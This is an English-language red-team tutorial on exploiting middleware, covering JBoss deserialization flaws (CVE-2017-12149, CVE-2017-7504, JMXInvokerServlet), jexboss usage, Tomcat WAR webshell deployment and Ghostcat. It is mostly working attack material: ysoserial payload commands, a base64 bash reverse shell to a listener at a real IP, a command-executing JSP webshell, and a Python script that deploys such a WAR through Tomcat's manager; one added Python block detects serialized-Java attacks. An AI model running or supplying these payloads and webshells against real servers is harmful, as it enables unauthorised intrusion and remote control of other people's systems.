This article introduces the exploitation surface of common middleware.
Common middleware includes JBoss, WebLogic, WebSphere, Tomcat, Apache httpd, Nginx and IIS.
JBoss
Since JBoss is encountered relatively often in red-blue exercises, its exploitation surface is recorded first.
JBoss is an open-source J2EE-based application server released under the LGPL, so it can be used free of charge in commercial applications; it is also an EJB container and server that supports the EJB 1.1, EJB 2.0 and EJB 3 specifications.
JBoss deserialization (CVE-2017-12149)
Vulnerability description
This is a Java deserialization vulnerability in the ReadOnlyAccessFilter of JBoss's HttpInvoker component. The filter deserializes the data sent by the client without any security checks, so a serialized gadget chain such as the Apache Commons Collections chains shipped with ysoserial gives remote code execution.
Affected Versions:
Jboss AS 5.x
Jboss AS 6.x
Environment Setup:
Here we use the vulhub environment
svn checkout https://github.com/vulhub/vulhub/trunk/jboss/CVE-2017-12149
cd CVE-2017-12149
docker-compose up -d
The vulnerable JBoss instance listens on port 8080.
Vulnerability reproduction
Request the route /invoker/readonly with a plain GET: it answers with a 500 status code (the filter tries to deserialize the empty request body and fails), which confirms the endpoint is exposed.
Use ysoserial to generate the serialized payload poc.ser.
# Base64-encode the reverse shell command (replace xxx/xxx with the listener's IP and port; the base64 below is the author's own listener)
echo "bash -i &>/dev/tcp/xxx/xxx <&1"|base64
YmFzaCAtaSAmPi9kZXYvdGNwLzE4Mi4xNjAuOS4zNS85OTk5IDwmMQo=
Use ysoserial's CommonsCollections5 (CC5) chain to generate the serialized payload:
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSAmPi9kZXYvdGNwLzE4Mi4xNjAuOS4zNS85OTk5IDwmMQo=}|{base64,-d}|{bash,-i}" > poc.ser
Post the serialized data to the vulnerable endpoint:
curl http://192.168.119.157:8080/invoker/readonly --data-binary @poc.ser
The listener on the VPS then receives the reverse shell.
Vulnerability analysis
The vulnerability lies in the doFilter method of ReadOnlyAccessFilter in the http invoker component, as shown in the following figure:
The method wraps the client data stream (request.getInputStream()) in an ObjectInputStream and calls readObject() on it without any security checks (red arrow in the figure); any gadget chain present on the server classpath is therefore executed during deserialization.
JBossMQ deserialization (CVE-2017-7504)
Vulnerability description:
Red Hat JBoss Application Server is an open-source Java EE application server. In JBoss AS 4.x and earlier, the JMS over HTTP Invocation Layer of JBossMQ (HTTPServerILServlet.java) deserializes client-supplied data, so a remote attacker can execute arbitrary code by sending specially crafted serialized data.
Affected versions:
JBoss AS 4.x
Environment Setup
svn checkout https://github.com/vulhub/vulhub/trunk/jboss/CVE-2017-7504
cd CVE-2017-7504
docker-compose up -d
The vulnerable endpoint is /jbossmq-httpil/HTTPServerILServlet.
The reproduction again uses the ysoserial CommonsCollections5 gadget chain. Generate the payload:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
Send the contents of 1.ser as the POST body:
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
Run docker-compose exec jboss bash to enter the container: /tmp/success has been created, confirming code execution.
JBoss JMXInvokerServlet deserialization vulnerability
Vulnerability description:
This is the classic JBoss deserialization vulnerability: /invoker/JMXInvokerServlet reads the serialized object posted by the user and deserializes it, so a gadget chain from Apache Commons Collections executes arbitrary code.
Environment Setup:
Same as for CVE-2017-7504 above.
Vulnerability Exploitation:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
curl http://your-ip:8080/invoker/JMXInvokerServlet --data-binary @1.ser
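All three endpoints above (/invoker/readonly, /jbossmq-httpil/HTTPServerILServlet and /invoker/JMXInvokerServlet) share one trait: the POST body is a raw Java serialized object and the server never checks it. From the defensive side that same trait makes the attack easy to spot on the wire. The following Python is an added example, not part of the original article, vulhub or ysoserial: it fingerprints a request body by the Java serialization header, reads the root class name when the stream starts with a new object, and raises an alert when such a body targets one of the three JBoss paths. The sample bytes are constructed to look like the start of a ysoserial CommonsCollections5 payload, whose root object is javax.management.BadAttributeValueExpException; the path list and the classify_request function are this example's own.

```python
import struct

# Constants from java.io.ObjectStreamConstants
STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = 5
TC_OBJECT = 0x73       # a new object follows
TC_CLASSDESC = 0x72    # a new class descriptor follows

# The JBoss endpoints discussed above; each deserializes the raw POST body.
# (List assembled for this example.)
JBOSS_DESER_PATHS = frozenset((
    "/invoker/readonly",
    "/invoker/JMXInvokerServlet",
    "/jbossmq-httpil/HTTPServerILServlet",
))


def is_java_serialized(body: bytes) -> bool:
    """True if the body starts with the Java serialization header AC ED 00 05."""
    return (len(body) >= 4 and body[:2] == STREAM_MAGIC
            and struct.unpack(">H", body[2:4])[0] == STREAM_VERSION)


def root_class_name(body: bytes):
    """Class name of the root object when the stream begins with
    TC_OBJECT + TC_CLASSDESC (the usual shape of a gadget-chain payload).
    Returns None if the body is not serialized Java or has another root."""
    if not is_java_serialized(body):
        return None
    pos = 4
    if len(body) < pos + 4 or body[pos] != TC_OBJECT or body[pos + 1] != TC_CLASSDESC:
        return None
    pos += 2
    (name_len,) = struct.unpack(">H", body[pos:pos + 2])  # modified-UTF-8 length
    pos += 2
    name = body[pos:pos + name_len]
    if len(name) != name_len:
        return None  # truncated stream
    return name.decode("utf-8", errors="replace")


def classify_request(path: str, body: bytes) -> dict:
    """Verdict for one HTTP request: a serialized Java body aimed at one of the
    JBoss invoker endpoints is an attack attempt whatever gadget chain it carries."""
    clean_path = path.split("?", 1)[0]
    serialized = is_java_serialized(body)
    return {
        "path": clean_path,
        "serialized_java": serialized,
        "root_class": root_class_name(body),
        "alert": serialized and clean_path in JBOSS_DESER_PATHS,
    }


# Constructed sample: the first bytes of a ysoserial CommonsCollections5 payload,
# whose root object is a javax.management.BadAttributeValueExpException.
# The rest of the real stream is omitted; only the header matters here.
CC5_ROOT = b"javax.management.BadAttributeValueExpException"
SAMPLE_CC5_HEAD = (STREAM_MAGIC + b"\x00\x05"
                   + bytes([TC_OBJECT, TC_CLASSDESC])
                   + struct.pack(">H", len(CC5_ROOT)) + CC5_ROOT)

if __name__ == "__main__":
    for path, body in (("/invoker/readonly", SAMPLE_CC5_HEAD),
                       ("/invoker/JMXInvokerServlet", b"login=admin"),
                       ("/index.html", SAMPLE_CC5_HEAD)):
        print(classify_request(path, body))
```

The check is deliberately independent of the gadget chain: blocking on the four header bytes reaching these paths catches every ysoserial payload, while the root class is only extracted to make the alert informative.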
Exploitation tools
jexboss
Project Address:https://github.com/joaomatosf/jexboss
Project Introduction:
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.
In short: a tool for attacking JBoss Application Server and other Java platforms.
Windows Installation:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
Attack commands:
Scanning mode:
python jexboss.py -mode auto-scan -network 192.168.119.0/24 -ports 8080 -results results.txt
Targeted exploitation:
python2 jexboss.py -u http://192.168.119.157:8080/
The reverse shell is obtained successfully.
JbossScan
Project Address:
https://github.com/GGyao/jbossScan
Project Introduction:
Scans targets for JBoss vulnerabilities.
Put the target URLs in target.txt and run:
python .\jbossScan.py
JBoss vulnerability detection tool by lab
Tomcat
Tomcat WAR deployment
Prerequisite: access to the Tomcat manager application (the management backend).
Prepare a malicious JSP webshell:
<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>horse</title>
</head>
<body>
<%
    // Only run when the caller supplies the password; the command comes from ?cmd=
    if ("admin".equals(request.getParameter("pwd"))) {
        java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int len = -1;
        byte[] bytes = new byte[4092];
        out.print("<pre>");
        while ((len = input.read(bytes)) != -1) {
            // Convert only the bytes actually read, not the whole buffer
            out.println(new String(bytes, 0, len, "GBK"));
        }
        out.print("</pre>");
    }
%>
</body>
</html>
Pack it into a WAR:
jar -cvf [war package name].war <directory to pack>
For example, from inside the directory containing the JSP:
jar -cvf test.war *
Upload test.war through the manager's "Deploy WAR file" function.
The webshell is then reachable under the context path named after the WAR (here /test/), followed by the JSP file name.
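The same procedure can be scripted instead of using the jar command and the manager's web form. The Python below is an added example, not from the original article or from Tomcat: build_war packs the JSP into a WAR in memory (a WAR is just a zip; Servlet 3.0+ webapps need no WEB-INF/web.xml), and deploy_request issues the PUT that the manager's text interface (/manager/text/deploy) accepts, which is what the HTML form calls behind the scenes. The base URL, the context path /test, the file name cmd.jsp and the credentials are placeholders; the account must hold the manager-script role, since the text interface rejects manager-gui-only accounts.

```python
import base64
import io
import urllib.parse
import urllib.request
import zipfile


def build_war(jsp_source: str, jsp_name: str = "shell.jsp") -> bytes:
    """Pack one JSP into a minimal WAR. Tomcat does not require WEB-INF/web.xml
    for Servlet 3.0+ webapps, so the JSP alone is enough; it is served at
    /<context>/<jsp_name>."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war: bytes) -> list:
    """List the entries of a WAR, e.g. to verify what was packed."""
    with zipfile.ZipFile(io.BytesIO(war)) as zf:
        return zf.namelist()


def basic_auth_header(user: str, password: str) -> str:
    """Value of the Authorization header the manager expects (HTTP Basic)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def deploy_request(base_url, context_path, war, user, password):
    """PUT /manager/text/deploy?path=<context> with the WAR as the body.
    The account needs the manager-script role; manager-gui alone gets a 403."""
    query = urllib.parse.urlencode({"path": context_path})
    url = f"{base_url.rstrip('/')}/manager/text/deploy?{query}"
    req = urllib.request.Request(url, data=war, method="PUT")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    return req


def deploy(base_url, context_path, war, user, password, timeout=10) -> str:
    """Send the deploy request and return Tomcat's one-line answer
    ('OK - Deployed application at context path /test' on success)."""
    req = deploy_request(base_url, context_path, war, user, password)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # usage: python deploy_war.py shell.jsp http://host:8080 user password
    import sys
    jsp = open(sys.argv[1], encoding="utf-8").read()  # the JSP from the section above
    war = build_war(jsp, "cmd.jsp")
    print(war_entries(war))
    print(deploy(sys.argv[2], "/test", war, sys.argv[3], sys.argv[4]))
    # afterwards: http://host:8080/test/cmd.jsp?pwd=admin&cmd=id
```

Context path and WAR name are decoupled here: the path query parameter decides where the application is mounted, so the zip itself needs no particular name.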
Tomcat arbitrary file read (CVE-2020-1938, "Ghostcat")
Prerequisites:
The AJP connector (port 8009 by default, enabled out of the box in the affected releases) is reachable, and Tomcat is one of:
Apache Tomcat 9.0.0.M1 to 9.0.0.30
Apache Tomcat 8.5.0 to 8.5.50
Apache Tomcat 7.0.0 to 7.0.99
The read is limited to files under the web application root (for example WEB-INF/web.xml), not the whole filesystem; when the application also lets an attacker upload a file, the same request can include it as a JSP and the file read becomes code execution.
Exploit script:
https://github.com/zhzyker/exphub/blob/master/tomcat/cve-2020-1938_exp.py